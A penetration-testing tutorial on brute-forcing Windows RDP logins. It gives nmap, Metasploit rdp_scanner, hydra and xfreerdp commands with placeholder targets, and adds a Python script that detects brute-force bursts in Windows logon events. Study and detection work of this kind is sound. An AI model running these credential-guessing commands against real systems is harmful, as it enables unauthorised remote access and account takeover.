# Exploiting RDP - Brute Force

## **Exploiting RDP**

* The Remote Desktop Protocol (RDP) is a proprietary GUI remote access protocol developed by Microsoft and is used to remotely connect and interact with a Windows system.
* RDP uses TCP port 3389 by default, and can also be configured to run on any other TCP port.
* RDP authentication requires a legitimate user account on the target system as well as the user’s password in clear-text.
* We can perform an RDP brute-force attack to identify legitimate user credentials that we can use to gain remote access to the target system.

## Attack Flow for Exploiting RDP - Brute Force

### 1. **Identify Running Services and Their Versions**

**Objective:** Determine the versions of the running services on the target system.

**Command:**

```bash
nmap -sV -O <Target_IP>
```

**Description:** Use Nmap to scan the target system and identify the versions of the running services.

#### **Alternative Command Using Metasploit:**

```bash
msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <Target_IP>
run
```

**Description:** Use the `rdp_scanner` module in Metasploit to identify RDP service details on the target system.

### 2. **Perform Brute Force Attack**

**Objective:** Obtain valid RDP credentials through a brute force attack.

**Command:**

```bash
hydra -L <user-list> -P <pass-list> rdp://<target-ip> -s <port>
```

**Description:** Use Hydra to perform a brute force attack on the RDP service of the target system using specified user and password lists.

### 3. **Establish RDP Connection**

**Objective:** Connect to the victim's machine using the obtained credentials.

**Command:**

```bash
xfreerdp /u:<user> /p:<password> /v:<Target_IP>:<port>
```

**Description:** Use `xfreerdp` to establish an RDP connection to the target system with the obtained username and password.
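Seen from the target host, the flow above shows up as a burst of failed logons from one source followed by a success. The sketch below is an added example, not part of the original notes: it flags that pattern in Windows Security events 4625 (failed logon) and 4624 (successful logon). The record layout, field names, thresholds and sample data are assumptions constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED, SUCCESS = 4625, 4624   # Windows Security log: failed / successful logon
RDP_LOGON_TYPES = {3, 10}      # 10 = RemoteInteractive; 3 = Network (RDP with NLA)

def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=2)):
    """Alert on sources with >= threshold failed logons inside `window`;
    record the account if a success from that source follows the burst."""
    recent = defaultdict(deque)  # src_ip -> (time, user) of failures still in window
    alerts = {}                  # src_ip -> alert record
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["logon_type"] not in RDP_LOGON_TYPES:
            continue             # e.g. console logons are not RDP guessing
        src, ts = ev["src_ip"], ev["time"]
        q = recent[src]
        while q and ts - q[0][0] > window:   # expire failures older than the window
            q.popleft()
        if ev["event_id"] == FAILED:
            q.append((ts, ev["user"]))
            if len(q) >= threshold:
                alert = alerts.setdefault(
                    src, {"src_ip": src, "users_tried": set(), "success_user": None})
                alert["users_tried"].update(user for _, user in q)
        elif ev["event_id"] == SUCCESS and src in alerts and q:
            alerts[src]["success_user"] = ev["user"]  # guess likely succeeded
    return list(alerts.values())

def _ev(sec, event_id, user, src_ip, logon_type=3):
    """Build one constructed event record (hypothetical field names)."""
    return {"time": datetime(2024, 1, 1, 9, 0, 0) + timedelta(seconds=sec),
            "event_id": event_id, "logon_type": logon_type,
            "user": user, "src_ip": src_ip}

# Constructed sample records using documentation-range addresses, not real log data.
SAMPLE_EVENTS = (
    [_ev(i * 2, FAILED, user, "203.0.113.7") for i, user in
     enumerate(["administrator", "administrator", "admin", "bob", "bob", "bob"])]
    + [_ev(14, SUCCESS, "bob", "203.0.113.7", logon_type=10)]     # burst, then success
    + [_ev(5, FAILED, "alice", "198.51.100.20"),                  # two typos far apart
       _ev(400, FAILED, "alice", "198.51.100.20"),
       _ev(410, SUCCESS, "alice", "198.51.100.20", logon_type=10)]
    + [_ev(20, FAILED, "svc", "203.0.113.9", logon_type=2)] * 6   # local console, ignored
)

if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(alert)
```

An alert with `success_user` set is the case that needs immediate response, since it means a guessed password was accepted for that account.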

***


**`Hacker's Mantra:`**`Are hackers a threat? The degree of threat presented by any conduct, whether legal or illegal, depends on the actions and intent of the individual and the harm they cause. - Kevin Mitnick`

